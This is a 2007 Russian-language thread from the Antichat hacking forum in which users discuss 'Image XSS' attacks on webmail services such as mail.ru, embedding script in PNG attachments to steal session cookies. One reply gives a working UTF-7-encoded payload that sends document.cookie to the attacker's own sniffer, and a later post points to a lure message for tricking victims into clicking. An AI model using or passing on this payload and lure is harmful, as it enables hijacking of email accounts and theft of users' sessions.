ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Image XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Image XSS
  #1  
Старый 08.08.2007, 17:37
Аватар для kalpsik
kalpsik
Познающий
Регистрация: 10.01.2007
Сообщений: 67
Провел на форуме:
459846

Репутация: 63
Отправить сообщение для kalpsik с помощью ICQ Отправить сообщение для kalpsik с помощью MSN
По умолчанию Image XSS
После прочтения разного материала выяснил несколько фактов:
1) Image XSS работает на всех известных мне почтовых службах(работает на момент написания поста).
2)кукисы тырятся.
3)XSS все-таки пассивная. Ибо рендеринг страницы происходит таким образом, что при вставке картинки непосредственно в тело письма, браузер не обрабатывает вложеный в нее код=(
4)данная XSS лично у меня заработала только с png-форматом=(

код вшитый в png'шку стандартный:
Код:
<script></script>
мэйл.ру обрабатывает на ура=)

осталась пара непоняток:
если вставить код наподобие
Код:
<html><meta http-equiv="Content-Type" content="text/html" charset="UTF-7">+ADw-script+AD4-сам скрипт+ADw-/script+AD4-
то например знак + не обрабатывается браузером....
и самое главное, как все-таки раскрутить активный XSS методом Image XSS?
 
Ответить с цитированием

  #2  
Старый 08.08.2007, 23:55
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию
1. У тебя там русские буквы "сам скрипт", поэтому теги скрипта не определятся.
2. Контент неправильно задан.
3. Чтобы решить проблему с плюсом, используй явный метод конкатенации.
В картинку-аттач вставляй это

Код:
<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-7">+ADw-script+AD4-img=new Image;img.src='http://твой_снифф?'.concat(document.cookie);+ADw-/script+AD4-
Обрати внимание на запись атрибута content.

4. Никакой кодировки UTF-7 (если мы говорим о мейл.ру) на данный момент не требуется. Отправляй аттач не с майл.ру.

Чтобы вытянуть из этого активную(ые), нужно взглянуть на проблему шире.
 
Ответить с цитированием

  #3  
Старый 09.08.2007, 17:22
Аватар для kalpsik
kalpsik
Познающий
Регистрация: 10.01.2007
Сообщений: 67
Провел на форуме:
459846

Репутация: 63
Отправить сообщение для kalpsik с помощью ICQ Отправить сообщение для kalpsik с помощью MSN
По умолчанию
слова "сам скрипт" - означает, что вместо этого у иеня там стоит скрипт=)
то что на mail.ru не требуется кодировки UTF-7 - я написал в своем посте.
вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)
 
Ответить с цитированием

  #4  
Старый 09.08.2007, 20:31
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию
Цитата:
Сообщение от kalpsik  
вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)
Отлично! А можно сразу сюда _http://win.mail.ru/cgi-bin/support ?

И на кой тебе активная в самой почте? Интересно - ищи сам. А вообще тебе более подошло бы юзать это

http://forum.antichat.ru/showpost.ph...4&postcount=11

"Вася/Маша я тебя убью/люблю! ссылка на дневник"

Но поторопись! Ибо,ибо...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Broken image, при использовании XSS через аватару Qwazar PHP, PERL, MySQL, JavaScript 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ